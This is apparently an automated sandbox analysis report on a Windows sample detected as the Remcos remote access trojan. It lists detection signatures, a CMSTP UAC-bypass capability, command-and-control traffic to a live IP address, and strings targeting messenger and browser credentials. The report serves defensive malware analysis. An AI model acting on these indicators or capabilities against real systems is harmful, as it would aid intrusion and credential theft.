Windows Analysis Report
cnaniAxghZ.exe

AI detected suspicious sample

Source: Yara match	File source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.name.exe.3f20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.name.exe.3f20000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2877207597.0000000003000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2876639458.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2821566748.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2877257882.0000000003012000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: name.exe PID: 8048, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 8084, type: MEMORYSTR

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: cnaniAxghZ.exe

Joe Sandbox ML: detected

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,		6_2_00433837
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,		7_2_00404423

Source: name.exe, 00000005.00000002.2821566748.0000000003F20000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_2b0e0a7b-1

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.name.exe.3f20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.name.exe.3f20000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2876639458.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2821566748.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: name.exe PID: 8048, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 8084, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 6_2_004074FD _wcslen,CoGetObject,

6_2_004074FD

Source: cnaniAxghZ.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: wntdll.pdbUGP source: name.exe, 00000005.00000003.2819399918.0000000004030000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.2820079168.00000000041D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: name.exe, 00000005.00000003.2819399918.0000000004030000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.2820079168.00000000041D0000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_00074696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00074696
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0007C93C FindFirstFileW,FindClose,	0_2_0007C93C
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0007C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0007C9C7
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0007F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0007F200
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0007F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0007F35D
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0007F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0007F65E
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_00073A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00073A2B
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_00073D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00073D4E
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0007BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0007BF27
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_00104696 GetFileAttributesW,FindFirstFileW,FindClose,	5_2_00104696
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_0010C93C FindFirstFileW,FindClose,	5_2_0010C93C
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_0010C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	5_2_0010C9C7
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_0010F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_0010F200
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_0010F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_0010F35D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_0010F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	5_2_0010F65E
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_00103A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	5_2_00103A2B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_00103D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	5_2_00103D4E
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_0010BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	5_2_0010BF27
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	6_2_00409253
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	6_2_0041C291
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	6_2_0040C34D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	6_2_00409665
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	6_2_0040880C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040783C FindFirstFileW,FindNextFileW,	6_2_0040783C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	6_2_00419AF5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	6_2_0040BB30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	6_2_0040BD37
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040AE51 FindFirstFileW,FindNextFileW,	7_2_0040AE51

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 6_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

6_2_00407C97

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.4:49737 -> 107.175.229.139:8087
Source: Traffic	Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 107.175.229.139:8087 -> 192.168.2.4:49737

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 107.175.229.139 8087			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 178.237.33.50 80			Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 07.175.229.139

Source: global traffic

TCP traffic: 192.168.2.4:49737 -> 107.175.229.139:8087

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 107.175.229.139 107.175.229.139
Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50

Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: ATOM86-ASATOM86NL ATOM86-ASATOM86NL

Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.229.139

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Code function: 0_2_000825E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_000825E2

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: svchost.exe, 00000006.00000002.2878530155.0000000005D20000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.2854252619.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: svchost.exe, 00000006.00000002.2878530155.0000000005D20000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.2854252619.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: svchost.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: svchost.exe, 00000007.00000003.2864837706.0000000003144000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: svchost.exe, 00000007.00000003.2864837706.0000000003144000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: bhv5230.tmp.7.dr	String found in binary or memory: pop-lva1.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhv5230.tmp.7.dr	String found in binary or memory: pop-lva1.www.linkedin.com0 equals www.linkedin.com (Linkedin)
Source: svchost.exe, 00000007.00000003.2868404025.0000000003144000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: tps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: svchost.exe, 00000007.00000003.2868404025.0000000003144000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: tps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: svchost.exe, 00000006.00000002.2877948678.00000000050C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000007.00000002.2868513015.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: svchost.exe, 00000006.00000002.2877948678.00000000050C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000007.00000002.2868513015.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)

Source: global traffic

DNS traffic detected: DNS query: geoplugin.net

Source: bhv5230.tmp.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
Source: svchost.exe, 00000006.00000002.2877479755.0000000003077000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2877334638.0000000003068000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2840816406.0000000003068000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2841755060.0000000003068000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2877257882.0000000003012000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2877524808.000000000308A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2839396466.0000000003068000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: name.exe, 00000005.00000002.2821566748.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2876639458.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: svchost.exe, 00000006.00000002.2877479755.0000000003077000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpSystem32
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://ocsp.digicert.com0:
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://ocsp.digicert.com0H
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://ocsp.digicert.com0Q
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://ocsp.msocsp.com0
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://ocsp.msocsp.com0S
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://ocspx.digicert.com0E
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://www.digicert.com/CPS0~
Source: svchost.exe, 00000006.00000002.2878530155.0000000005D20000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.2854252619.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: svchost.exe, 00000006.00000002.2878530155.0000000005D20000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.2854252619.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: svchost.exe, 00000006.00000002.2878530155.0000000005D20000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.2854252619.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: svchost.exe, 00000006.00000002.2878530155.0000000005D20000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.2854252619.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: bhv5230.tmp.7.dr	String found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696334965379
Source: svchost.exe, 00000007.00000002.2868756077.00000000009B3000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: svchost.exe, 00000009.00000002.2854252619.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
